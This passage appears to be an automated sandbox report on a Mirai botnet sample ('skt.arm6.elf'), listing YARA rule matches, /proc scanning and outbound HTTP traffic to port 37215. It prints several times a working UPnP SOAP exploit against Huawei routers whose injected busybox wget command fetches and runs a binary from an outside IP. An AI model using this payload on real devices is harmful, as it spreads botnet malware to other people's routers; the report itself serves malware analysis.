20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: skt.arm6.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: skt.arm6.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

            System Summary

            barindex
            Source: skt.arm6.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: skt.arm6.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: 5497.1.00007fa430017000.00007fa43002a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
            Source: 5497.1.00007fa430017000.00007fa43002a000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: skt.arm6.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: skt.arm6.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: 5497.1.00007fa430017000.00007fa43002a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
            Source: 5497.1.00007fa430017000.00007fa43002a000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
            Source: classification engineClassification label: mal88.troj.linELF@0/0@42/0
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/231/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/233/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1333/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1695/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/911/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/914/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/917/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/19/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1591/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1588/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/246/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/5/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1585/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/7/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/129/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/8/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/802/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/803/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/804/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/3407/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/22/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/23/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/24/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/25/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/26/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/27/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/28/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/29/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1484/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/490/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/250/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/130/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/251/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/131/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/132/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/133/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1479/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/378/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/258/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/259/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/931/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1595/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/812/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/933/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/30/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/3419/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/35/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/3310/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/260/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/261/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/262/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/142/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/263/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/264/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/265/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/145/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/266/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/267/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/268/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/3303/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/269/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1486/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/1806/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/3440/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/270/cmdlineJump to behavior
            Source: /tmp/skt.arm6.elf (PID: 5501)File opened: /proc/271/cmdlineJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 38538 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42160 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46146 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45188 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43014 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47222 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44842 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38338 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48904 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49564 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53224 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44110 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56058 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58904 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33492 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60876 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57650 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46904 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35014 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53776 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44022 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60070 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35600 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54326 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46372 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36618 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58424 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43198 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42328 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59646 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54282 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40600 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45200 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39686 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48950 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52822 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54332 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41850 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 57874 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49590 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48296 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55992 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35216 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37062 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52792 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40336 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40206 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58008 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37084 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34030 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41640 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42418 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42534 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42156 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36542 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37416 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60386 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35230 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50594 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59188 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54474 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41642 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51050 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46638 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35856 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40946 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34304 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41088 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58354 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55542 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33232 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37746 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56790 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37342 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58938 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40130 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47526 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45464 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 32844 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48246 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40652 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59532 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49306 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51556 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51456 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44190 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33286 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39464 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56114 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49102 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42878 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56858 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53276 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46038 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 50856 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47874 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45200 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51392 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47204 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47346 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59596 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37594 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46192 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39914 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52806 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48748 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 46944 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53392 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33544 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45848 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54896 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44162 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 44038 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49574 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49440 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55586 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55538 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42010 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34586 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36636 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47988 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 60330 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43648 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34494 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51936 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33566 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 56194 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54928 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42350 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58368 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42776 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54422 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37020 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35840 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45030 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49472 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 51310 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 48610 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 54640 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53154 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37988 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 47640 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 53704 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41990 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45130 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55460 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55888 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36414 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 38998 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39020 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33998 -> 37215
